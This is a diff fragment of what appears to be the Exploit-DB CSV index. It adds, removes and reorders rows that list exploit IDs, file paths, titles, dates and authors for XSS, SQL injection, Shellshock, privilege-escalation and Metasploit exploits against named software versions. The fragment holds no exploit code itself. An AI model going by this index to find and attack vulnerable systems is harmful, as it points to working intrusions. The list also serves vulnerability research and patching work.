XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 -34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 - 'acroform_PlugInMain' Memory Corruption Vulnerability",2010-09-06,ITSecTeam,windows,dos,0 -34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 - 'X-Forwarded-For' Header SQL Injection Vulnerability",2010-09-06,cnryan,php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager `index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 @@ -31168,7 +31173,12 @@ id,file,description,date,author,platform,type,port 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0 +34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 +34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 +34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0 +34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0 34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting Vulnerability",2010-09-09,"David Hoyt",asp,webapps,0 +34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script 'q' Parameter Cross-Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0 34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Parameter Cross-Site Scripting Vulnerability",2009-08-13,Isfahan,php,webapps,0 34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting 'resume_register.php' Cross-Site Scripting Vulnerability",2009-09-06,MizoZ,php,webapps,0 @@ -31176,8 +31186,9 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 - 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0 +34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting Vulnerability",2010-09-06,"High-Tech Bridge SA",php,webapps,0 @@ -31189,7 +31200,6 @@ id,file,description,date,author,platform,type,port 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0 -34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 - Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0 @@ -31233,8 +31243,6 @@ id,file,description,date,author,platform,type,port 34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0 34681,platforms/php/webapps/34681.txt,"Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)",2014-09-16,"Claudio Viviani",php,webapps,0 34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability",2014-09-16,Vulnerability-Lab,ios,webapps,8080 -34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script 'q' Parameter Cross-Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0 -34684,platforms/php/webapps/34684.pl,"Joomla Spain Component - 'nv' Parameter SQL Injection Vulnerability",2010-09-20,FL0RiX,php,webapps,0 34685,platforms/windows/remote/34685.py,"Basic Web Server 1.0 - Directory Traversal and Denial of Service Vulnerabilities",2010-09-19,"John Leitch",windows,remote,0 34686,platforms/windows/remote/34686.txt,"YelloSoft Pinky 1.0 - Directory Traversal Vulnerability",2010-09-16,"John Leitch",windows,remote,0 34687,platforms/asp/webapps/34687.txt,"Smart ASP Survey 'catid' SQL Injection Vulnerability",2009-08-27,Moudi,asp,webapps,0 @@ -31266,21 +31274,30 @@ id,file,description,date,author,platform,type,port 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross-Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0 +34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 +34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0 +34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 +34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0 +34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 +34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross-Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0 +34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0 +34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash PoC",2014-09-20,"niko sec",windows,dos,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0 -34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 34730,platforms/php/webapps/34730.txt,"DragDropCart assets/js/ddcart.php sid Parameter XSS",2009-07-20,Moudi,php,webapps,0 34731,platforms/php/webapps/34731.txt,"DragDropCart includes/ajax/getstate.php prefix Parameter XSS",2009-07-20,Moudi,php,webapps,0 34732,platforms/php/webapps/34732.txt,"DragDropCart index.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0 34733,platforms/php/webapps/34733.txt,"DragDropCart search.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0 34734,platforms/php/webapps/34734.txt,"DragDropCart login.php redirect Parameter XSS",2009-07-20,Moudi,php,webapps,0 34735,platforms/php/webapps/34735.txt,"DragDropCart productdetail.php product Parameter XSS",2009-07-20,Moudi,php,webapps,0 +34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 34736,platforms/php/webapps/34736.txt,"EZArticles 'articles.php' Cross-Site Scripting Vulnerability",2009-08-20,Moudi,php,webapps,0 34737,platforms/php/webapps/34737.txt,"EZodiak \'index.php\' Cross-Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0 34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community Cross-Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0 +34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 user_addfood.php date Parameter XSS",2009-07-20,Moudi,php,webapps,0 34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 user_forgot_pwd_form.php info Parameter XSS",2009-07-20,Moudi,php,webapps,0 34742,platforms/php/webapps/34742.txt,"MyWeight 1.0 user_login.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0 @@ -31291,8 +31308,7 @@ id,file,description,date,author,platform,type,port 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0 -34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastin Magof",hardware,webapps,80 -34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Snchez",windows,dos,0 +34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 @@ -31303,7 +31319,7 @@ id,file,description,date,author,platform,type,port 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 -34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 +34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 @@ -31319,9 +31335,7 @@ id,file,description,date,author,platform,type,port 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 Add map in /etc/hosts file",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 -34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastin Magof",hardware,webapps,80 -34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 -34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0 +34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross-Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0 34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0 34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x - 'index.php' Cross-Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0 @@ -31337,32 +31351,25 @@ id,file,description,date,author,platform,type,port 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross-Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0 +34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0 +34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection Vulnerability",2010-10-04,"Eugene Salov",php,webapps,0 +34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 - Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0 -34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 -34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 -34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 -34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0 -34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0 -34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting Vulnerability",2009-07-08,"599eme Man",php,webapps,0 34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting Vulnerability",2010-10-04,"High-Tech Bridge SA",php,webapps,0 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin 'vkeyboard.php' Cross-Site Scripting Vulnerability",2010-10-05,"Moritz Naumann",php,webapps,0 -34815,platforms/windows/remote/34815.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0 -34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0 +34815,platforms/windows/remote/34815.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0 +34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 -34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 -34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 -34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0 -34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 -34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross-Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0 -34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0 -34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0 +34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal Vulnerability",2010-11-08,"John Leitch",php,webapps,0 +34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress 'vodpod_gallery_thumbs.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 +34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0 34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 @@ -31387,8 +31394,8 @@ id,file,description,date,author,platform,type,port 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 -34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a_ 2.3b_ 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 - (.bmp) Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 @@ -31431,6 +31438,9 @@ id,file,description,date,author,platform,type,port 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE (MSF) Shellshock Exploit",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0 +34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 +35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 +35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles /riddles/results.php searchquery Parameter XSS",2009-08-20,Moudi,php,webapps,0 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 @@ -31452,9 +31462,6 @@ id,file,description,date,author,platform,type,port 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 -34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 -34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 @@ -31488,8 +31495,14 @@ id,file,description,date,author,platform,type,port 34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x SQL Error Information Disclosure Vulnerability",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0 34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0 +35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x - 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0 34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0 +34978,platforms/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-11-08,"Gjoko Krstic",windows,remote,0 +34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Function Information Disclosure Vulnerability",2010-11-07,"Mateusz Kocielski",php,remote,0 +34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 +34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0 +35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service Vulnerability",2010-11-24,"Vegard Nossum",linux,dos,0 34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple CSRF Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0 34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0 34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0 @@ -31500,14 +31513,9 @@ id,file,description,date,author,platform,type,port 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0 34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress - 'handler_image.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 